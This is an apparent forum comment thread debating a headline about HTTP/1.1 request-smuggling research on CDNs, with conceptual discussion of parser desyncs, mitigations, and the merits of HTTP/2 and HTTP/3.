> Hi, I’m the author of this research. It’s great to see interest and I can promise some quality research and a strong argument to kill HTTP/1.1 but the headline of this article goes a bit too far. The specific CDN vulnerabilities have been disclosed to the vendors and patched (hence the past tense in the abstract) – I wouldn’t drop zero day on a CDN!
From the comment section. In other words, click-bait title.
I think I figured out a way to do secure registration with a MITM without certificates, so there might be a way out from this mess.
But still you need to transfer the client and check it's hash for it to work and that's hard to implement in practice.
But you could bootstrap the thing over HTTPS (the download of the client) and then not need it ever again which is neat. Specially if you use TCP/HTTP now.
Appreciate you pointing that out. HTTP/1.1 may be relatively long in tooth, but this particular vulnerability seems straightforward to mitigate to me. Especially at the CDN level.
Forgive my optimism here but this seems overblown and trivial to detect and reject in firewalls/cdns.
Cloudflare most recently blocked a vulnerability affecting some php websites where a zip file upload contains a reverse shell. This seems plain in comparison (probably because it is).
This sensationalist headline, that doomsday style clock (as another poster shared) makes me question the motives of these researchers. Have they shorted any CDN stocks?
The underlying flaw is a parser differential. To detect that generically you'd need a model of both(/all) parsers involved, and to detect when they diverge. This is non-trivial.
You can have the CDN normalize requests so that it always outputs wellformed requests. This way only one parser deals with an untrusted / ambiguous input.
"Stop working" here apparently means scheduled release of an exploit of a vulnerability in proxies that do access control and incorrectly handle combinations of headers Content-Length and Transfer-Encoding: chunked.
> incorrectly handle combinations of headers Content-Length and Transfer-Encoding: chunked.
I think the article uses this as an example of the concept of Request Smuggling in general. This broad approach has been known for a long time. I assume the new research uses conceptually similar but concretely different approaches to trigger parser desyncs.
I might just be stupid but I'm not quite seeing the full issue I think.
From my reading this is a problem if:
1. Your CDN/Load balancer allows for HTTP/1.1 connections
2. You do some filtering/firewalling/auth/etc at your CDN/Load balancer for specific endpoints
I'm sure it's more than that, and I'm just missing it.
If you do all your filtering/auth/etc on your backend servers this doesn't matter right? Obviously people DO filtering/auth/etc at the edge so they would be affected but 1/3rd seems high. Maybe 1/3rd of traffic is HTTP/1.1 but they would also have to be doing filtering/auth at the edge to be hit by this right?
Again, for the 3rd time, I'm probably missing something, just trying to better understand the issue.
If it's similar to a vulnerability reported a couple of years back, the gist of it would be.
Some load balancers fronting multiple application connection through multiplexed requests on a single HTTP 1.1 connection, and bugs occur with the handling (generally handling request boundaries).
For example you can have a HTTP 1.1 front connection that behind the scenes operates a separate HTTP 1.0, 1.1, 2 or 3 connection.
When smuggling additional data through the request you trip up the handler at the load balancer handler to inject a response that shouldn't be there, which will be served for one of the clients (even the wrong client request).
Similar to HTTP response splitting attacks of the past.
Eg. 3 requests come into the load balancer, and request 2 smuggles in an extra response that could be served as a response to request 1 or 3.
Is it really impossible for the CDNs to mitigate the vulnerability without disabling the site altogether? I'm skeptical that is the case. I'm sure there is a way to properly separate different requests.
There was a mad dash to patch stuff but there wasn't much destruction. It became mostly a nothingburger event because of preparation to fix things ahead-of-time and triage for the bits that did break.
I have used HTTP/1.1 pipelining outside the browser for 17 years^2
It works beautifully for me outside the browser
Today I use 1.1 pipelining literally every day. Almost all websites I encounter still support and enable it
Would love to see some examples of sites that do not accept HTTP/1.1 amd only accept HTTP/[23]
1. Unlike the designers of HTTP/1.1, the designers of HTTP/2 have made mistakes, bad enough to warrant an immediate replacement
"This head-of-line blocking in HTTP/2 is now widely regarded as a design flaw, and much of the effort behind QUIC and HTTP/3 has been devoted to reduce head-of-line blocking issues.^[58]^[59]"
58. ^ Huston, Geoff (March 4, 2019). "A Quick Look at QUIC". www.circleid.com. Retrieved August 2, 2019.
59. ^ Gal, Shauli (June 22, 2017). "The Full Picture on HTTP/2 and HOL Blocking". Medium. Retrieved August 3, 2019.
This is interesting to me since this is allegedly the "problem" with HTTP/1.1 (cf. problem with advertising-sponsored web browsers) that HTTP/2 was supposed to "solve"^3
2. To retrieve multiple resources from same host in a single TCP connections. (Unlike browsers that routinely open up dozens of TCP connections to multiple hosts, usually for telemetry/advertising/tracking purposes.) It is desirable for me to receive the responses in the same order the requests were sent. As such, "HOL" is a on-issue for me.
HTTP/3 reminds me of CurveCP that was published years before QUIC^4
Except the HTTP/3 RFC is written by Akamai employee whereas CurveCP is from an academic, like HTTP/1.1
Also CurveCP needs no "SNI" that leaks domain names in plaintext like TLS and hence needs no complicated Band-Aid like ECH. Still waiting for ECH to be available outside of maybe a limited percentage of sites on a single CDN (Cloudflare)^5 It has been years
From the comment section. In other words, click-bait title.